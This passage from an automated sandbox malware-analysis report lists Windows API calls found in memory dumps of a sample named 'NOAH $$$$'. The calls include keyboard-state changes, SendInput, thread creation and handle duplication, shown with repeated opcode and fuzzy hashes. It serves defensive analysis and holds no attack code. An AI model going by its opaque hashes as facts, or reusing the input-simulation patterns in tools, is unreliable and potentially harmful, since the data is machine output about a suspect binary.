                                                                                                                                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                        APIs
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 896007046-0
                                                                                                                                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                        • GetFocus.USER32 ref: 00448ACF
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3429747543-0
                                                                                                                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                        • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                        • String ID: %lu$\VH
                                                                                                                                        • API String ID: 3164766367-2432546070
                                                                                                                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                        • API String ID: 3850602802-3636473452
                                                                                                                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 0041F707
                                                                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                        • _free.LIBCMT ref: 0041F71A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                        • String ID: [B
                                                                                                                                        • API String ID: 1020059152-632041663
                                                                                                                                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                                        APIs
                                                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                                        • __getptd.LIBCMT ref: 00413DBD
                                                                                                                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                                        • _free.LIBCMT ref: 00413E07
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 155776804-0
                                                                                                                                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1957940570-0
                                                                                                                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                        APIs
                                                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 259663610-0
                                                                                                                                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3220332590-0
                                                                                                                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1612042205-0
                                                                                                                                        • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                                                                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                                        • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                                                                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove_strncmp
                                                                                                                                        • String ID: >$U$\
                                                                                                                                        • API String ID: 2666721431-237099441
                                                                                                                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
